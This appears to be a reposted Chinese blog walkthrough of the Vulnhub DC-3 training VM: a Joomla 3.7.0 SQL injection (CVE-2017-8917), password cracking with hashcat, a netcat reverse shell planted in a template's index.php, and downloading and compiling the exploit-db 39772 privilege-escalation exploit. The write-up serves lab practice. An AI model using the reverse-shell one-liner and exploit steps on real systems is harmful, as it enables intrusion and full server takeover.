Vulnhub DC-3 - 代码天地

Vulnhub DC-3

其他 2020-01-13 10:48:45 阅读次数: 0

访问服务，发现是 joomla 服务，使用 joomlacan 扫描

joomlascan -u 192.168.6.129

3.7.0 版本，存在 SQl 注入漏洞（CVE-2017-8917）

github 下载 exp 然后运行，获取到用户名密码 hash

使用 hashcat 破解 hash，破解密码得 snoopy

登录到后台

发现提示，需要获取到 root 权限

编辑模版，修改 index.php，nc 反弹 shell

rm /tmp/bd;mkfifo /tmp/bd;cat /tmp/bd | /bin/bash -i 2>&1 | nc 192.168.6.128 1234 >/tmp/bd

kali 监听 1234 端口：nc -lnvp 1234

exploit-db 搜索相关提权脚本，搜索到

https://www.exploit-db.com/exploits/39772

curl -O https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
tar -xvf exploit.tar
./compile.sh
./doubleput

成功提权，gcc 编译时 warning 提示，误以为是 error 报错，耽误了好久

爱吃柠檬的苹果

发布了29 篇原创文章 · 获赞 8 · 访问量 6742

私信关注

猜你喜欢

转载自blog.csdn.net/qq_39293438/article/details/95919666

Vulnhub DC-3

VulnHub—DC-3

vulnhub渗透测试靶机DC-3

Vulnhub靶机DC-3渗透

vulnhub DC-3靶机实战

记一次vulnhub|渗透测试 DC-3

vulnhub靶场之DC-3渗透教程（Joomla CMS）

vulnhub： DC 3

DC-3

VulnHub之dc1靶场（3）

VulnHub通关日记-DC_3-Walkthrough

vulnhub的DC-1

Dc:7 Vulnhub Walkthrough

Vulnhub DC-6

Vulnhub DC-5

Vulnhub DC-4

VulnHub—DC-1

VulnHub—DC-2

vulnhub~DC-9

vulnhub之 DC -2

VulnHub::DC-1

vulnhub: DC 1

【Vulnhub】DC9

Vulnhub_DC-6

Vulnhub-DC-1

【vulnhub】【DC系列】DC3 - Joomla 靶机

靶机渗透------DC-3

靶机实战-DC-3

DC-3 渗透测试

DC-3靶机学习

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

循环神经网络（rnn）讲解

Tigao教程四：单独的关节运动

金蝶K3WISE15.0-注册套打教程

如何在Mac上配置Kubernetes

Android应用结束自身进程的方法

SpringMVC学习十三拦截器栈

中国驻洛杉矶总领馆举行新春招待会

HttpClient get post 发送

11 - three.js 笔记 - 绘制三维字体模型

Mysql递归获取某个父节点下面的所有子节点和子节点上的所有父节点

每日归档

更多

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)